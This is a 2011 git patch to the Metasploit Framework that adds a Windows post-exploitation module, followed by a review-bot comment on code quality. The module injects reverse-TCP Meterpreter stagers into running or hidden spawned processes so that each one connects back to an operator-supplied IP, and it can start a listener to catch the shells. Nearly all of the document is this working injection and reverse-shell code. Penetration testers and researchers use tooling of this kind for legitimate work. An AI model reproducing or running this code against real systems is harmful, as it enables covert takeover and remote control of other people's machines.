From 43ba211d3d51b8d48f2bd2473c28a5c1389bc9ab Mon Sep 17 00:00:00 2001
From: Carlos Perez
Date: Sat, 26 Mar 2011 03:35:59 +0000
Subject: [PATCH] Module for injection in to a list of processes a given payload connecting to a list of given IP addresses.
git-svn-id: file:///home/svn/framework3/trunk@12145 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../manage/multi_meterpreter_inject.rb | 137 ++++++++++++++++++
 1 file changed, 137 insertions(+)
 create mode 100644 modules/post/windows/manage/multi_meterpreter_inject.rb
diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb
new file mode 100644
index 0000000000..21a36dc8a1
--- /dev/null
+++ b/modules/post/windows/manage/multi_meterpreter_inject.rb
@@ -0,0 +1,137 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Inject in memory multiple payloads',
+ 'Description' => %q{ This module will inject in to several process a given
+ payload and connecting to a given list of IP Addresses.
+ The module works with a given lists of IP Addresses and
+ process PIDs if no PID is given it will start a the given
+ process in the advanced options and inject the selected
+ payload in to the memory of the created module.},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Carlos Perez '],
+ 'Version' => '$Revision$',
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter']
+ ))
+ register_options(
+ [
+ OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', "windows/meterpreter/reverse_tcp"]),
+ OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
+ OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
+ OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
+ OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false])
+
+ ], self.class)
+ register_advanced_options(
+ [
+ OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])
+ ],self.class)
+ end
+
+ # Run Method for when run command is issued
+ def run
+ # Set variables
+ multi_ip = nil
+ multi_pid = nil
+
+ print_status("Running module against #{sysinfo['Computer']}")
+
+ if datastore['HANDLER']
+ create_multi_handler(datastore['PAYLOAD'],datastore['LPORT'])
+ end
+
+ multi_ip = datastore['IPLIST'].split(";")
+ multi_pid = datastore['PIDLIST'].split(";")
+
+ multi_ip.zip(multi_pid).each do |a|
+ # Check if we have an IP for the session
+ if a[1]
+ payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
+ inject(a[1],payload)
+ select(nil, nil, nil, 5)
+ else
+ # if no PID we create a process to host the Meterpreter session
+ payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
+ pid_num = start_proc(datastore['PROCESSNAME'])
+ inject(pid_num,payload)
+ select(nil, nil, nil, 5)
+ end
+ end
+ end
+
+ # Function for injecting payload in to a given PID
+ #-------------------------------------------------------------------------------
+ def inject(target_pid, payload_to_inject)
+ print_status("Injecting meterpreter into process ID #{target_pid}")
+ begin
+ host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
+ raw = payload_to_inject.generate
+ mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
+
+ print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
+ print_status("Writing the stager into memory...")
+ host_process.memory.write(mem, raw)
+ host_process.thread.create(mem, 0)
+ print_good("Successfully injected Meterpreter in to process: #{target_pid}")
+ rescue::Exception => e
+ print_error("Failed to Inject Payload to #{target_pid}!")
+ print_error(e)
+ end
+ end
+
+ # Function for Creation of Connection Handler
+ #-------------------------------------------------------------------------------
+ def create_multi_handler(payload_to_inject,rport,rhost = '0.0.0.0')
+ print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
+ mul = client.framework.exploits.create("multi/handler")
+ mul.datastore['WORKSPACE'] = session.workspace
+ mul.datastore['PAYLOAD'] = payload_to_inject
+ mul.datastore['LHOST'] = rhost
+ mul.datastore['LPORT'] = rport
+ mul.datastore['EXITFUNC'] = 'process'
+ mul.datastore['ExitOnSession'] = false
+
+ mul.exploit_simple(
+ 'Payload' => mul.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+ )
+ print_good("Multi/Handler starterd!")
+ end
+
+ # Function for Creating the Payload
+ #-------------------------------------------------------------------------------
+ def create_payload(payload_type,lhost,lport)
+ print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
+ payload = payload_type
+ pay = client.framework.payloads.create(payload)
+ pay.datastore['LHOST'] = lhost
+ pay.datastore['LPORT'] = lport
+ return pay
+ end
+
+ # Function starting notepad.exe process
+ #-------------------------------------------------------------------------------
+ def start_proc(proc_name)
+ print_good("Starting Notepad.exe to house Meterpreter Session.")
+ proc = client.sys.process.execute(proc_name, nil, {'Hidden' => true })
+ print_good("Process created with pid #{proc.pid}")
+ return proc.pid
+ end
+end
\ No newline at end of file
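Review bot: `inject` catches `::Exception` (the `rescue::Exception => e` line), which also swallows `Interrupt` and `SystemExit`, so an operator's Ctrl-C in the middle of a multi-target run is reported as "Failed to Inject Payload" and the loop simply moves on to the next PID instead of stopping; narrowing it to `rescue ::StandardError => e` keeps only real injection failures on that path. The `PROCESS_ALL_ACCESS` handle returned by `session.sys.process.open` is never released on either the success or the failure path; if the returned object exposes `close`, as the stdapi Process class appears to, an `ensure` clause that closes `host_process` when it was opened would release one handle per target. The `PROCESSNAME` advanced option's description is still the placeholder string `'Description'`; `OptString.new('PROCESSNAME', [false, 'Process to spawn and inject into when no PID is supplied for an address', 'notepad.exe'])` would document what it controls. The allocation size `raw.length + (raw.length % 1024)` reads as a round-up to a 1024-byte boundary but is not one (1500 bytes yields 1976); it is always at least `raw.length`, so it over-allocates rather than truncates, and plain `raw.length` would be clearer.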